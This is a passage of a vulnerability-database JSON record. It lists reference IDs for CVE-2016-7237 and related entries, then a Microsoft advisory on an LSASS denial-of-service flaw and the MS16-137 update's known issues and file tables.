"THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "THREATPOST:DEDA9E6DCA21010A215B158BFF80253C", "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "THREATPOST:DF54323828EEC1DDCE4B2312AC6F085F", "THREATPOST:E067CFBFA163616683563A8ED34648FE", "THREATPOST:E068C231265847BA99669A8EBF0D395D", "THREATPOST:E22E26BB31C17ACCC98C59076AF88CD7", "THREATPOST:E46805A1822D16B4725517D4B8786F57", "THREATPOST:E4FBCA31AB2D69F0292283738E873960", "THREATPOST:E539817E8025A93279C63158F37F2DFB", "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "THREATPOST:E6DC1F407BA6CEE26FE38C95EBB10D7A", "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "THREATPOST:E7C5C8276111C637456F053327590E4C", "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "THREATPOST:EC55500DAF9E1467C9C94C82758F810C", "THREATPOST:ED7B090DD1289553529F8B6FD87BF467", "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03"]}, {"type": "zdt", "idList": ["1337DAY-ID-26296", "1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009"]}, {"type": "cve", "idList": ["CVE-2016-7237", "CVE-2017-11882"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "kaspersky", "idList": ["KLA11139"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201892253"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-137.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139700", "PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:ED087560040A02BCB1F68DE406A7F577"]}, {"type": "threatpost", "idList": ["THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022"]}]}, "exploitation": null, "vulnersScore": 6.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"mscve": [{"lastseen": "2021-12-06T18:25:24", "description": "A denial of service vulnerability exists in the Windows Local Security Authority Subsystem Service (LSASS). A remote, but authenticated, attacker who successfully exploited this vulnerability could cause the target system to become nonresponsive.\n\nTo exploit the vulnerability, a remote attacker would first have to log on to the system and send a specially crafted request to the target system.\n\nThe security update addresses the vulnerability by changing the way that LSASS handles specially crafted requests.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-08T08:00:00", "type": "mscve", "title": "Local Security Authority Subsystem Service Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7237"], "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7237", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-7237", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}], "mskb": [{"lastseen": "2022-06-15T15:21:30", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege. To exploit this vulnerability, the attacker would first have to authenticate to the targeted domain-joined system by using valid user credentials. An attacker who successfully exploited this vulnerability could elevate their permissions from unprivileged user account to administrator. The attacker could then create accounts, install programs, or view, change, or delete data. The attacker could then try to elevate privilege locally by executing a specially crafted application that could manipulate NTLM password change requests. \n \nTo learn more about the vulnerability, see [Microsoft Security Bulletin MS16-137](<https://technet.microsoft.com/library/security/ms16-137>). \n\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you require before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n### Known issues in this security update\n\nUser-initiated and programmatic password changes to domain user accounts may fail if the same user account is logged on to more than one computer at the same time and is used to make password changes to the same user account from two or more computers. Such password changes fail only if NTLM is used. \n \nSpecifically, the following errors are returned: \n \nHexadecimal| Decimal| Error ID| Error description \n---|---|---|--- \n0xc0000388| 1073740920| STATUS_DOWNGRADE_DETECTED| The system detected a possible attempt to compromise security. Please make sure that you can contact the server that authenticated you. \n0x4f1| 1265| ERROR_DOWNGRADE_DETECTED| The system detected a possible attempt to compromise security. Please make sure that you can contact the server that authenticated you. \n \n\n\n#### Example scenario\n\n 1. A domain user logs on to computer A and computer B.\n 2. The user changes their domain password from computer A without logging off computer B.\n 3. The domain user tries to change their password from computer B.\nIn this scenario, the password change attempt from computer B may fail with the following error message: \n \n\n\nThe system detected a possible attempt to compromise security. Please make sure that you can contact the server that authenticated you. \n\n\n \nIf the password change is performed programmatically, you may receive either an ERROR_DOWNGRADE_DETECTED or a STATUS_DOWNGRADE_DETECTED error status. This behavior occurs when the NTLM authentication package is used for the password change for domain accounts if Kerberos fails to find a domain controller and then falls back to NTLM. In this scenario, NTLM fallback was disabled by [MS16-101](<https://technet.microsoft.com/library/security/ms16-101>) and was re-enabled by [MS16-137](<https://technet.microsoft.com/library/security/ms16-137>)-related updates. \n \n \nCalling NTLM directly also causes password changes to fail in this scenario. To resolve all domain password change issues, make sure that Kerberos is functional, and also make sure that Kerberos is used for password changes to domain accounts. For more information, see the \"Known issue 1\" section in KB [3167679](<http://support.microsoft.com/en-us/help/3167679>). \n\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see \n[Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n \nNote For Windows RT 8.1, this update is available through Windows Update only. \n\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=3198510>) website. \n\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Support for Microsoft Update](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Troubleshooting and Support](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Virus Solution and Security Center](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB3198510-ia64.msu| EA36EA5822944918E9C4C456CAD5CA9E8D3CC62C| 98D8D328E49BEEC6818F459429AD8977F278E44EE799038CAAF5EBC5F2EA6109 \nWindows6.0-KB3198510-x64.msu| BBB5BA6DB6EF138C633614FB6C9B7ED5C5662287| 2C1A9B41D95ACAB92AAE8B33D5346B58AB0937EE5EC626DA3F1E14E0535141BD \nWindows6.0-KB3198510-x86.msu| E4DB0F0831CA873DDDDA03AE761FEC4550F5D2BA| 1D9E5D1AD53F06BB2A21401D5D48982F3BCDC429B59E67B735A59E643980E580 \n \n\n\n## \n\n__\n\nFile information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.Windows Vista and Windows Server 2008 file informationNotes: The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed. \nFor all supported ia64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 03:25| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 01:48| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:04| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 04:03| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 03:43| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 04:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 03:21| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 373,760| 08-Oct-2016| 16:38| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 255,488| 08-Oct-2016| 15:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,536| 08-Oct-2016| 16:29| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 352,768| 08-Oct-2016| 16:30| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 349,696| 08-Oct-2016| 16:39| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 346,624| 08-Oct-2016| 16:32| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 338,944| 08-Oct-2016| 16:36| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,964,544| 06-Feb-2016| 01:39| IA-64 \nAdvapi32.dll| 6.0.6002.24025| 1,963,520| 08-Oct-2016| 15:11| IA-64 \nBcrypt.dll| 6.0.6002.19677| 583,680| 10-Aug-2016| 13:07| IA-64 \nBcrypt.dll| 6.0.6002.24004| 584,192| 10-Aug-2016| 13:07| IA-64 \nLsasrv.dll.mui| 6.0.6002.24025| 59,904| 08-Oct-2016| 16:33| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:35| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 49,664| 08-Oct-2016| 15:15| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 8,192| 08-Oct-2016| 15:17| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 59,392| 08-Oct-2016| 16:23| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:25| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 30,208| 08-Oct-2016| 16:21| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:22| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 29,696| 08-Oct-2016| 16:35| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:37| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 20,992| 08-Oct-2016| 16:26| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:28| Not applicable \nLsasrv.dll.mui| 6.0.6002.24025| 21,504| 08-Oct-2016| 16:31| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 16:33| Not applicable \nKsecdd.sys| 6.0.6002.19655| 1,030,376| 11-May-2016| 13:10| IA-64 \nLsasrv.dll| 6.0.6002.19701| 3,260,928| 08-Oct-2016| 15:46| IA-64 \nLsasrv.mof| Not applicable| 13,780| 03-Apr-2009| 21:34| Not applicable \nLsass.exe| 6.0.6002.18541| 17,920| 16-Nov-2011| 14:10| IA-64 \nSecur32.dll| 6.0.6002.19623| 202,752| 18-Mar-2016| 16:34| IA-64 \nKsecdd.sys| 6.0.6002.23970| 1,030,888| 11-May-2016| 13:08| IA-64 \nLsasrv.dll| 6.0.6002.24025| 3,265,536| 08-Oct-2016| 15:12| IA-64 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nLsass.exe| 6.0.6002.24025| 17,920| 08-Oct-2016| 14:28| IA-64 \nSecur32.dll| 6.0.6002.24025| 202,752| 08-Oct-2016| 15:13| IA-64 \nNcrypt.dll| 6.0.6002.19678| 524,800| 10-Aug-2016| 16:08| IA-64 \nNcrypt.dll| 6.0.6002.24025| 524,800| 08-Oct-2016| 15:12| IA-64 \nRpcrt4.dll| 6.0.6002.19598| 3,298,816| 06-Feb-2016| 01:41| IA-64 \nRpcrt4.dll| 6.0.6002.24025| 3,289,088| 08-Oct-2016| 15:13| IA-64 \nWdigest.dll| 6.0.6002.19659| 482,816| 14-May-2016| 15:31| IA-64 \nWdigest.dll| 6.0.6002.24025| 483,328| 08-Oct-2016| 15:13| IA-64 \nMsv1_0.dll| 6.0.6002.19701| 572,416| 08-Oct-2016| 15:46| IA-64 \nMsv1_0.dll| 6.0.6002.24025| 571,904| 08-Oct-2016| 15:12| IA-64 \nSchannel.dll| 6.0.6002.19678| 819,200| 10-Aug-2016| 16:09| IA-64 \nSchannel.dll| 6.0.6002.24025| 821,248| 08-Oct-2016| 15:13| IA-64 \nMrxsmb10.sys| 6.0.6002.19431| 669,184| 27-Jun-2015| 14:19| IA-64 \nMrxsmb10.sys| 6.0.6002.24025| 670,208| 08-Oct-2016| 14:18| IA-64 \nMrxsmb20.sys| 6.0.6002.19431| 270,336| 27-Jun-2015| 14:19| IA-64 \nMrxsmb20.sys| 6.0.6002.24025| 272,384| 08-Oct-2016| 14:18| IA-64 \nMrxsmb.sys| 6.0.6002.19279| 323,072| 09-Jan-2015| 00:12| IA-64 \nMrxsmb.sys| 6.0.6002.24025| 325,632| 08-Oct-2016| 14:18| IA-64 \nBcrypt.dll| 6.0.6002.19677| 275,968| 10-Aug-2016| 13:14| x86 \nBcrypt.dll| 6.0.6002.24004| 275,968| 08-Oct-2016| 13:13| x86 \nLsasrv.mof| Not applicable| 13,780| 08-Mar-2016| 00:42| Not applicable \nSecur32.dll| 6.0.6002.19701| 77,312| 08-Oct-2016| 15:52| x86 \nLsasrv.mof| Not applicable| 13,780| 07-Mar-2016| 23:37| Not applicable \nSecur32.dll| 6.0.6002.24025| 77,312| 08-Oct-2016| 15:18| x86 \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86 \nRpcrt4.dll| 6.0.6002.24025| 678,912| 08-Oct-2016| 15:18| x86 \nWdigest.dll| 6.0.6002.19659| 175,616| 14-May-2016| 15:41| x86 \nWdigest.dll| 6.0.6002.24025| 175,616| 08-Oct-2016| 15:18| x86 \nMsv1_0.dll| 6.0.6002.19701| 219,136| 08-Oct-2016| 15:51| x86 \nMsv1_0.dll| 6.0.6002.24025| 219,136| 08-Oct-2016| 15:17| x86 \nSchannel.dll| 6.0.6002.19678| 284,160| 10-Aug-2016| 15:44| x86 \nSchannel.dll| 6.0.6002.24025| 284,672| 08-Oct-2016| 15:18| x86 \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,024| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 266,240| 08-Oct-2016| 15:29| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:16| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:19| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 360,448| 08-Oct-2016| 16:24| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 356,352| 08-Oct-2016| 16:26| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 348,160| 08-Oct-2016| 16:20| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86 \nAdvapi32.dll| 6.0.6002.24025| 802,816| 08-Oct-2016| 15:15| x86 \nNcrypt.dll| 6.0.6002.19678| 206,336| 10-Aug-2016| 15:43| x86 \nNcrypt.dll| 6.0.6002.24025| 205,312| 08-Oct-2016| 15:17| x86 \nFor all supported x64-based versionsFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 371,200| 06-Feb-2016| 04:25| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:39| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:22| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 04:43| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:44| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 02:09| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 381,952| 06-Feb-2016| 04:02| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,808| 06-Feb-2016| 03:20| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:12| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 366,080| 06-Feb-2016| 03:13| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 383,488| 06-Feb-2016| 05:05| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 03:03| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 03:55| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 05:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 374,272| 06-Feb-2016| 03:03| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,416| 06-Feb-2016| 04:29| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:07| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:33| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,904| 06-Feb-2016| 04:41| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:18| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 03:14| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 04:00| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 03:37| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 04:19| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 371,200| 08-Oct-2016| 16:35| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 379,392| 08-Oct-2016| 16:39| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 376,832| 08-Oct-2016| 16:45| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 373,760| 08-Oct-2016| 16:40| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 393,216| 08-Oct-2016| 16:35| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 255,488| 08-Oct-2016| 15:47| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 381,952| 08-Oct-2016| 16:42| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 375,808| 08-Oct-2016| 16:44| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,536| 08-Oct-2016| 16:36| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 366,080| 08-Oct-2016| 16:50| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 383,488| 08-Oct-2016| 16:42| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 380,928| 08-Oct-2016| 16:43| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 352,768| 08-Oct-2016| 16:45| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 349,696| 08-Oct-2016| 16:49| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 374,272| 08-Oct-2016| 16:48| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 380,416| 08-Oct-2016| 16:42| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,536| 08-Oct-2016| 16:44| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 379,392| 08-Oct-2016| 16:38| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 379,904| 08-Oct-2016| 16:38| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 385,536| 08-Oct-2016| 16:38| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 375,296| 08-Oct-2016| 16:40| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 375,296| 08-Oct-2016| 16:41| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 346,624| 08-Oct-2016| 16:42| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24025| 338,944| 08-Oct-2016| 16:42| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,067,008| 06-Feb-2016| 01:59| x64 \nAdvapi32.dll| 6.0.6002.24025| 1,067,520| 08-Oct-2016| 15:38| x64 \nBcrypt.dll| 6.0.6002.19677| 306,688| 10-Aug-2016| 13:07| x64 \nBcrypt.dll| 6.0.6002.24004| 306,688| 10-Aug-2016| 13:08| x64 \nLsasrv.dll.mui| 6.0.6002.24025| 44,544| 08-Oct-2016| 16:23| Not applicable \nLsass.exe.mui| 6.0.6002.24025| 10,752| 08-Oct-2016| 